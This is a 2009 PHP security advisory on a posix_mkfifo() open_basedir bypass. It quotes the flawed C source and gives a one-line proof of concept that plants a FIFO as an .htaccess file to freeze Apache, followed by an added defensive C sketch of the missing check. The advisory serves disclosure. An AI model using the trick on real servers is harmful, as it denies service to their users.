[ PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ]

Author: Grzegorz Stachowiak
Date:
- - Dis.: 25.09.2009
- - Pub.: 29.09.2009
Risk: Low
Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11 and prior

- --- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.posix-mkfifo.php

- --- 1. PHP 5.2.11/5.3.0 (posix.c) open_basedir bypass ---

posix_mkfifo — Create a fifo special file (a named pipe)

posix_mkfifo() creates a special FIFO file which exists in the file system and acts as a bidirectional communication endpoint for processes.

The function does not check the open_basedir value, so even with open_basedir enabled we can create a file in any directory the PHP process can write to. This lets us "freeze" Apache and prevent access to any writable folder.

- ---ext/posix/posix.c---

PHP_FUNCTION(posix_mkfifo)
{
	char *path;
	int path_len;
	long mode;
	int result;

	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl", &path, &path_len, &mode) == FAILURE) {
		RETURN_FALSE;
	}

	/* [1] only safe_mode is consulted here; there is no open_basedir check */
	if (PG(safe_mode) && (!php_checkuid(path, NULL, CHECKUID_ALLOW_ONLY_DIR))) {
		RETURN_FALSE;
	}

	result = mkfifo(path, mode);
	if (result < 0) {
		POSIX_G(last_error) = errno;
		RETURN_FALSE;
	}

	RETURN_TRUE;
}

- ---ext/standard/file.c---

[1] posix_mkfifo() checks only the safe_mode value; the open_basedir restriction is never applied to the path.

- ---example0 (5.2.11/5.3.0)---

x@x-desktop:/var/www/$ php -v
PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php -r "echo ini_get('open_basedir').PHP_EOL;"
/var/www:/tmp
x@x-desktop:/var/www$

|----------------------------------------------------------------|

x@x-desktop:/var/www$ cat fifo.php
<?
posix_mkfifo('/home/y/www/.htaccess',0777);
?>

|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:31--  http://localhost:80/config.txt
           => `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 25 [text/plain]

    0K ->                                                        [100%]

(24.41 KB/s) - `config.txt' saved [25/25]

|----------------------------------------------------------------|

x@x-desktop:/var/www$ php fifo.php
x@x-desktop:/var/www$

|----------------------------------------------------------------|

x@x-desktop:/var/www$ wget http://localhost/config.txt
--17:39:43--  http://localhost:80/config.txt
           => `config.txt'
Connecting to localhost:80... connected!
HTTP request sent, awaiting response...

|----------------------------------------------------------------|

Apache tries to open the .htaccess file, but a FIFO special file does not allow a "normal" read: the open blocks until a writer attaches to the pipe. As a result, no file in this directory or any of its subdirectories can be served any more.

- --- 3. Contact ---

Author: Grzegorz Stachowiak
Email: stachowiak {a|t} analogicode.pl
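As an added illustration, not code from this advisory or from PHP itself, the check that posix_mkfifo() was missing can be modelled in standalone C: canonicalise the parent directory of the requested path with realpath() (the FIFO does not exist yet, so the parent is what can be resolved), then require it to lie inside one of the colon-separated open_basedir entries before calling mkfifo(2). The names check_open_basedir() and mkfifo_restricted() are invented for this example; PHP's real check is php_check_open_basedir() in main/fopen_wrappers.c and is not reproduced here. The sample paths in main() are constructed for the demonstration and assume a Unix system where /tmp and /etc exist.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <libgen.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Return 1 if canonical `dir` equals canonical `base` or lies beneath it.
 * The boundary test rejects "/tmpfoo" for base "/tmp". */
static int path_within(const char *dir, const char *base)
{
    size_t blen = strlen(base);
    if (strcmp(base, "/") == 0)
        return 1;                                   /* base "/" allows everything */
    if (strncmp(dir, base, blen) != 0)
        return 0;
    return dir[blen] == '\0' || dir[blen] == '/';
}

/* Hypothetical stand-in for the open_basedir check posix_mkfifo() lacked.
 * `basedirs` is the colon-separated list from ini_get('open_basedir').
 * Returns 0 if `path` may be created, -1 if it must be refused. */
int check_open_basedir(const char *path, const char *basedirs)
{
    char parent[PATH_MAX], base_real[PATH_MAX];
    char *tmp = strdup(path);
    if (tmp == NULL)
        return -1;
    /* realpath() resolves symlinks and ".." so a textual prefix test
     * cannot be fooled by "/tmp/../etc/x". */
    char *ok = realpath(dirname(tmp), parent);
    free(tmp);
    if (ok == NULL)
        return -1;                                  /* unresolvable parent: fail closed */

    char *list = strdup(basedirs);
    if (list == NULL)
        return -1;
    int allowed = -1;
    char *save = NULL;
    for (char *b = strtok_r(list, ":", &save); b != NULL; b = strtok_r(NULL, ":", &save)) {
        if (realpath(b, base_real) == NULL)
            continue;                               /* a base that does not exist grants nothing */
        if (path_within(parent, base_real)) {
            allowed = 0;
            break;
        }
    }
    free(list);
    return allowed;
}

/* Hardened wrapper: behaves like mkfifo(2) but refuses paths outside basedirs. */
int mkfifo_restricted(const char *path, mode_t mode, const char *basedirs)
{
    if (check_open_basedir(path, basedirs) != 0) {
        errno = EACCES;
        return -1;
    }
    return mkfifo(path, mode);
}

int main(void)
{
    const char *bases = "/var/www:/tmp";            /* same value as in the advisory's ini_get() */
    const char *tests[] = {
        "/tmp/demo.fifo",                           /* inside an allowed base */
        "/tmp/../etc/demo.fifo",                    /* traversal resolves to /etc */
        "/home/y/www/.htaccess",                    /* the advisory's target, outside open_basedir */
    };
    for (size_t i = 0; i < sizeof tests / sizeof tests[0]; i++)
        printf("%-28s -> %s\n", tests[i],
               check_open_basedir(tests[i], bases) == 0 ? "allowed" : "denied");
    return 0;
}
```

Note that the base list is canonicalised with realpath() as well, so a base entry given as a symlink still matches the directory it points to, and an unresolvable parent directory is treated as a denial rather than an allowance.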